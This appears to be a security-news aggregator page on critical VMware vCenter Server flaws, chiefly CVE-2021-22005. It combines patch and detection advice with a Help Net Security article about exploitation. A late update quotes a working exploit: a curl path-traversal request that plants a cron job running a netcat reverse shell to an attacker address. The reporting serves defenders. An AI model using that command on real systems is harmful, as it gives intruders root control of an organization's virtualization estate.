ZeroHour
Help Net Securitypublished ()ingested @zeljkazorz

Plug critical VMware vCenter Server flaw before ransomware gangs start exploiting it (CVE-2021-22005)

criticalRansomware exploited in the wildimportance 60CVE-2021-22005CVE-2021-21985CVE-2021-21972

Vulnerabilities mentionedAll →

CVEVulnerabilityCVSSEPSSFlagsAffectedExposurePublished
CVE-2021-21972
Unauthenticated RCE in VMware vCenter Server vSphere Client Plugin

CVE-2021-21972 is a remote code execution vulnerability in a plugin of the vSphere Client in VMware vCenter Server, underpinned by a path traversal flaw (CWE-23) in the plugin's file-upload functionality. It is triggered over the network through port 443: an attacker who can reach the vCenter web interface can submit crafted file-upload requests, traverse to arbitrary filesystem paths, and plant executable files on the underlying operating system. Successful exploitation yields unrestricted privileges on the vCenter host OS, giving attackers control of the central management platform for an organization's entire VMware vSphere virtualized estate. Any organization running an affected vCenter Server release whose port 443 is reachable from untrusted networks is exposed. The flaw is listed in CISA's Known Exploited Vulnerabilities catalog (added 2021-11-03) with known ransomware use and a 99.9% EPSS score (100th percentile), indicating active, widespread exploitation in the wild, though no public PoC is recorded in this data.

Do: Apply the vCenter Server updates published in VMware's advisory for CVE-2021-21972 as soon as possible, prioritizing internet-facing or partner-reachable vCenter instances. Until patched, restrict access to vCenter on port 443 to trusted management networks and review access logs for unauthenticated file-upload activity against the vSphere Client upload endpoint. Because ransomware operators have actively exploited this bug, hunt for signs of compromise such as webshells or unexpected new local accounts on vCenter appliances.

9.8100% KEV ransomware PoC ×3
  • VMware vCenter Server
largetens of thousands of internet-exposed vCenter servers, with hundreds of thousands of deployments overall
CVE-2021-21985
Remote Code Execution in VMware vCenter Server vSAN Health Check plug-in

CVE-2021-21985 is an improper input validation flaw (CWE-20, with related unsafe reflection CWE-470 and SSRF CWE-918 classifications) in the Virtual SAN Health Check plug-in of the VMware vSphere Client, which is enabled by default in vCenter Server. It is triggered by crafted requests sent to the plug-in over the network; VMware indicated that network access to vCenter's HTTPS port (443) is sufficient to reach the vulnerable component. A successful attacker gains remote code execution with unrestricted privileges on the underlying operating system hosting vCenter Server, a highly privileged position in the virtualization stack. Any organization running an affected VMware vCenter Server is affected; because vCenter is the default management plane for vSphere, this spans a very large share of enterprise virtualization estates, with tens of thousands of instances directly exposed to the internet. Exploitation is confirmed in the wild: CISA added the flaw to the Known Exploited Vulnerabilities catalog on 2021-11-03 with known ransomware use and requires applying vendor updates, and EPSS puts the 30-day exploitation probability at essentially 100%, though the source data lists no public PoC.

Do: Update vCenter Server per VMware's instructions; fixes shipped in May 2021 for the 6.5, 6.7, and 7.0 branches (e.g., 6.5 U3n, 6.7 U3o, and 7.0 U2c — verify your current build against the vendor advisory). Until patched, restrict access to vCenter's HTTPS (443) interface to trusted management networks rather than the open internet, and review appliance logs and running processes for indicators of exploitation, since ransomware operators are known to use this flaw after gaining network access.

9.8100% KEV ransomware PoC
  • VMware vCenter Server
largetens of thousands of internet-exposed vCenter servers (public scan data), with a total installed base likely in the hundreds of thousands
CVE-2021-22005
Path Traversal File Upload RCE in VMware vCenter Server (Analytics Service)

CVE-2021-22005 is a path-traversal (CWE-23) file upload flaw in the Analytics service of VMware vCenter Server, the central management platform for VMware vSphere environments. An attacker with network access to the server's HTTPS port (443) can send crafted upload requests that traverse directories and write arbitrary files, achieving critical remote code execution on the vCenter host (VMware rated the flaw critical; this dataset's CVSS field was still pending). Successful exploitation gives attackers control of the vSphere management plane and, in practice, the ESXi hosts and virtual machines it manages, making it a high-value target for ransomware operators. All on-premises vCenter Server deployments of the affected versions are exposed, with internet-reachable instances at greatest risk since network access to port 443 is the only prerequisite. The flaw was added to CISA's Known Exploited Vulnerabilities catalog on 2021-11-03 with known ransomware use, EPSS assigns a ~100% (100th percentile) probability of exploitation within 30 days, and no public proof-of-concept was known at the time of this dataset.

Do: Upgrade to the fixed releases in VMware advisory VMSA-2021-0020 (vCenter Server 7.0 U2c, 6.7 U3o, or 6.5 U3q), or apply the vendor workaround of disabling the Analytics service if patching must be delayed. Restrict exposure of port 443 to untrusted networks, and hunt exposed vCenter servers for compromise indicators (webshells, unexpected accounts or processes) since exploitation is confirmed and ransomware campaigns are known to use this flaw.

9.8100% KEV ransomware PoC
  • VMware vCenter Server Version ranges not enumerated in the source data; per VMware advisory VMSA-2021-0020 (September 2021) the flaw affects vCenter Server 6.5, 6.7 and 7.0 prior to
largetens of thousands of internet-exposed vCenter servers (hundreds of thousands of deployments overall)
Full article806 words · extracted from helpnetsecurity.com · click to collapse

VMware has fixed 19 vulnerabilities affecting VMware vCenter Server and VMware Cloud Foundation, the most critical of which is CVE-2021-22005.

CVE-2021-22005

“This vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,” the company noted.

“The ramifications of this vulnerability are serious and it is a matter of time – likely minutes after the disclosure – before working exploits are publicly available. With the threat of ransomware looming nowadays the safest stance is to assume that an attacker may already have control of a desktop and a user account through the use of techniques like phishing or spearphishing, and act accordingly. This means the attacker may already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence.”

About VMware vCenter Server and Cloud Foundation

VMware vCenter Server is software that allows administrators to provision, monitor, orchestrate, and control their VMware vSphere deployments (virtual machines) from a centralized location. It can be installed on a Windows machine or a preconfigured Linux version (i.e., the vCenter Server Appliance).

VMware Cloud Foundation is a hybrid cloud platform that provides software-defined services for compute, storage, networking, security and cloud management to run enterprise apps in private or public environments.

About the fixed vulnerabilities

The offered security updates fix 19 vulnerabilities in all, most of which have been reported by George Noseevich and Sergey Gerasimov of SolidLab LLC.

The vulnerabilities affect vCenter Server versions 6.5, 6.7, and 7.0 and Cloud Foundation versions 3.x and 4.x.

CVE-2021-22005 – the most critical one, with a CVSS score of 9.8 – is an arbitrary file upload vulnerability in the Analytics service, which can be used to execute commands and software on the vCenter Server Appliance. A malicious actor with network access to port 443 on vCenter Server could exploit it by uploading a specially crafted file.

“The other issues have lower CVSS scores but still may be usable to an attacker that is already inside your organization’s network,” the company explained.

These can allow attackers to esclate privileges, access restricted endpoints, manipulate VM network settings, gain access to sensitive information, execute malicious scripts, delete non critical files, and create a denial of service condition.

What to do?

As noted before, VMware urges administrators to consult the advisory, ascertain which version of the solutions they are using, and upgrade to a fixed version as soon as possible.

The only workaround offered is for CVE-2021-22005, the rest of the security holes require a patch to be closed.

“At best, workarounds are temporary solutions to buy a short amount of time until patching can commence. They rely on editing files and changing vSphere in ways that are not intended and might cause serious issues if errors are made. Workarounds also tend to be more challenging for vSphere Admins who do not have deep UNIX experience. Just using UNIX text editors can be a challenge,” the company explained.

“Patching vCenter Server is much more straightforward, can be done via API or UI, does not introduce human error, does not create other operational concerns, and should already be an established process in an organization.”

Rapid7’s Glenn Thorpe also recommends admins to patch right away.

“While there are currently no reports of exploitation, we expect this to quickly change within days — just as previous critical vCenter vulnerabilities did (CVE-2021-21985, CVE-2021-21972). Additionally, Rapid7 recommends that, as a general practice, network access to critical organizational infrastructure only be allowed via VPN and never open to the public internet,” he added.

A very thorough Q&A document regarding these vulnerabilities and updates is available here.

UPDATE (September 25, 2021, 02:55 a.m. PT):

“On September 24, 2021, VMware confirmed reports that CVE-2021-22005 is being exploited in the wild. Security researchers are also reporting mass scanning for vulnerable vCenter Servers and publicly available exploit code. Due to the availability of exploit code, CISA expects widespread exploitation of this vulnerability,” warns the US federal agency.

UPDATE (September 29, 2021, 07:20 a.m. PT):

A working exploit for CVE-2021-22005 is now available and being used by attackers:

CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below.

curl -kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 172.16.57.1 4444" https://t.co/wi08brjl3r pic.twitter.com/bwjMA21ifA

— wvu (@wvuuuuuuuuuuuuu) September 27, 2021

The Randori Attack Team has also developed a reliable working exploit but won’t be disclosing it.

“Organizations that have or had affected vCenter versions exposed to the Internet since the vulnerability was made public on September 21, should assume that an adversary may have gained access to their network and review historical logs for anomalous behavior, such as abnormal usernames or source IP connections, and signs of compromise,” the team has advised, and has shared indicators of exploitation.

Text extracted automatically; images, tables and formatting may be missing. Original: https://www.helpnetsecurity.com/2021/09/22/cve-2021-22005/